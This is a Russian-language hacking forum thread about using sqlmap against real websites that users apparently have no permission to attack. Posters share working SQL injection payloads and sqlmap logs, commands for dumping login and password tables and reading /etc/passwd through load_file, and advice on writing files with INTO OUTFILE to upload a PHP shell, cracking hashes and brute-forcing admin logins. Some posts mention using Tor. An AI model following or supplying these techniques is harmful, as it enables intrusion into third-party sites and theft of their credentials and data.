Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    да нах, это всё сурковская пропаганда...
     
  2. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,192
    Reputations:
    62
    Ребят тут есть что то интересное?
    Code:
    3306/tcp open mysql MySQL (unauthorized)
    
    Как расковырять?
     
  3. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Ничего
     
  4. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    Если открыт доступ из вне и есть данные для входа в бд.
    Искать на сайте sql injectuion и надеяться что там пользователь с правами.
     
  5. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,192
    Reputations:
    62
    На сайте затычка от прова...
     
  6. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Вопрос, как выводить пароли по списку логинов ?
     
  7. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    есть post реквест с данными по типу - action=edit&data={"ItemID":"<тут недостаточная фильтрация>"}, как крутить мапом?

    сделал так:
    action=edit&data={"ItemID":"1*"}, он правильно подставляет тесты в зачение itemid, сайт сам же выдает ошибку:
    Code:
    exec - Error in SQL:
    
    Ну и собственно ниже бэктрейс с ошибкой синтаксиса, как в этом случае раскрутить ?
     
  8. GoodBoy

    GoodBoy New Member

    Joined:
    24 Jul 2017
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Использую тор, и столкнулся с тем, что при boolean-based blind sql получение данных идет некорректно, как настроить задержку/исправить это? Насколько я понимаю - причина в скорости.
     
  9. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Чем можно дэкодировать юникод который достает мапа?
     
  10. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Хочу вытащить хеш от phpmyadmin но не достаточно прав через sqlmap.
    Есть пути обхода ?

    Code:
     [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
     
    #690 Sensoft, 5 Jul 2018
    Last edited: 5 Jul 2018
  11. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    И как можно ускорить дамп ? скуля слепая увеличение потоков не очень помогает, сервер на сайте хороший
    Code:
     [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
     
    #691 Sensoft, 5 Jul 2018
    Last edited: 5 Jul 2018
  12. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    уважаемые, есть вопрос, насколько адекватно sqlmap раскручивает и вообще крутит ли уязвимости asp,aspx, html
    пытался по стандартному методу -u --dbs ,но ни одной так и не удалось раскрутить, мб кто с этим вопросом уже морочился, подскажите, плиз
     
  13. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    а что по поводу asp? достаточно большое кол-во уязвимостей находит
     
  14. mardoksp

    mardoksp Banned

    Joined:
    8 Apr 2007
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    Добрый день.

    Помогите, пожалуйста, раскрутить.
    Нашел уязвимость, получил список бд, пользователь не DBA. Получил хэши, запустил на скан на сайте onlinehashcrack.com

    Как раскрутить дальше, чтобы залить php shell? (os-shell не отрабатывает)
    Как можно через sql-shell получить список файлов/директорий?
     
  15. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    во первых попробовать через админку, возможно там будет функционал по заливке файлов, тут всё зависит от движка
    во вторых попробовать залить через into outfile тестовый файл в /tmp/ и затем прочитать его через load_file, если отработает - искать полный путь до директории где лежит сайт и в ней искать директорию доступную на запись, затем можно заливать
    никак. если только ОС не FreeBSD
     
  16. mardoksp

    mardoksp Banned

    Joined:
    8 Apr 2007
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    вход на админку закрыт через http basic authentication apache, надо брутать пароли

    уже пробовал, ошибка execution of non-query SQL statements is only available when stacked queries are supported

    Думал загрузить через load_file .htpasswd, чтобы побрутать, но не получается.

    Например, не могу понять почему
    Code:
    sqlmap -u "url/file.php?term=inf&item_id=123" --sql-query="select load_file('/home/site/www/info.php') from mysql.user" --no-cast
    выдает
    а вот
    Code:
    sqlmap -u "url/file.php?term=inf&item_id=123" --sql-query="select load_file('/home/site/www/index.php') from mysql.user" --no-cast
     
  17. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    а причём тут stacked queries вообще
    into outfile и load_file должны работать и без них
    вообще для чтения и записи у sqlmap есть стандартные флаги: --file-read, --file-write, --file-dest. попробуй с ними поиграться
    возможно такое что на index.php стоят права 600 и владелец какой-нибудь апач а ты пытаешся прочитать его от пользователя mysql
     
  18. mardoksp

    mardoksp Banned

    Joined:
    8 Apr 2007
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    load работает, но into может не работать, если mysql запущен --secure-file-priv
     
  19. mardoksp

    mardoksp Banned

    Joined:
    8 Apr 2007
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    разобрался с этим сайтом :)

    Теперь вопрос про другой сайт. Нашел дыру (на битриксе).
    Но не могу прочитать файлы, т.е. как обычно делаю --file-read='/etc/passwd', но выдает ошибку
    Похожа ошибка была на другом сайте, она появлялась тогда, когда файл отсутствовал по указанному пути

    Code:
    [17:30:10] [INFO] resuming back-end DBMS 'mysql'
    [17:30:10] [INFO] testing connection to the target URL
    [17:30:12] [CRITICAL] page not found (404)
    it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: SECTION_ID (GET)
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: ID=1) OR (SELECT 9559 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(9559=9559,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SAhe
    ---
    [17:30:14] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0
    [17:30:14] [INFO] fingerprinting the back-end DBMS operating system
    [17:30:14] [INFO] the back-end DBMS operating system is Linux
    [17:30:14] [INFO] fetching file: '/etc/passwd'
    [17:30:14] [INFO] resumed:
    [17:30:14] [WARNING] there was a problem decoding value ' ' from expected hexadecimal form
    do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
    [17:30:21] [INFO] retrieved:
    [17:30:21] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
    files saved to [1]:
    [*] /root/.sqlmap/output/site/files/_etc_passwd (size differs from remote file)
    
    [17:30:21] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 1 times
    

    404 (Not Found) - 1 times ошибка выдается, скорее всего, по причине того, что при открытии страницы с sql-inject он отдает json но с HTTP CODE = 404

    Теперь остается узнать какой параметр добавить, чтобы не было

    Ладно /etc/passwd может быть закрыт, но файлы битрикса хоть какие-то уже должен прочитать.


    И в продолжении, в чем может быть причина, если это не отрабатывает

    Code:
    sqlmap -u site/inject.php?ID=1 -D database -T table_login -C LOGIN,PASSWORD --dump
    
    И выдает ошибку

    А вот это отрабатывает


    Code:
    [17:49:02] [INFO] resuming back-end DBMS 'mysql'
    [17:49:02] [INFO] testing connection to the target URL
    [17:49:04] [CRITICAL] page not found (404)
    it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: SECTION_ID (GET)
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: ID=1) OR (SELECT 9559 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(9559=9559,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SAhe
    ---
    [17:49:06] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0
    [17:49:06] [INFO] fetching SQL SELECT statement query output: 'select login from table_login where id=1'
    [17:49:08] [INFO] used SQL query returns 1 entries
    [17:49:09] [INFO] retrieved: admin
    select login from table_login where id=1:    'admin'
    [17:49:09] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 1 times

    Кодировка db - utf8
     
  20. mardoksp

    mardoksp Banned

    Joined:
    8 Apr 2007
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    Найдена уязвимость

    Code:
    Parameter: product_id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: route=product/product&path=1&product_id=1 AND 7670=7670
        Vector: AND [INFERENCE]
    При попытке получить список баз данных вываливает ошибку
    [03:50:18] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.6.33, Nginx
    back-end DBMS: MySQL 5 (MariaDB fork)
    [03:50:18] [INFO] fetching database names
    [03:50:18] [INFO] fetching number of databases

    [03:50:18] [DEBUG] resuming configuration option 'string' (3D)
    [03:50:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [03:50:18] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51
    sqlmap got a 301 redirect to 'http://site/index.php?route=product/product&path=1&product_id=1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))'. Do you want to follow? [Y/n] n
    [03:50:22] [WARNING] unexpected HTTP code '301' detected. Will use (extra) validation step in similar cases
    [03:50:22] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48
    [03:50:23] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9

    [03:50:25] [INFO] retrieved:
    [03:50:25] [DEBUG] performed 3 queries in 7.29 seconds
    [03:50:25] [ERROR] unable to retrieve the number of databases
    [03:50:25] [INFO] falling back to current database
    [03:50:25] [INFO] fetching current database

    [03:50:25] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>64
    [03:50:27] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>32
    [03:50:28] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>1

    [03:50:30] [INFO] retrieved:
    [03:50:30] [DEBUG] performed 3 queries in 4.97 seconds
    [03:50:30] [CRITICAL] unable to retrieve the database names

    Как дальше раскрутить? Спасибо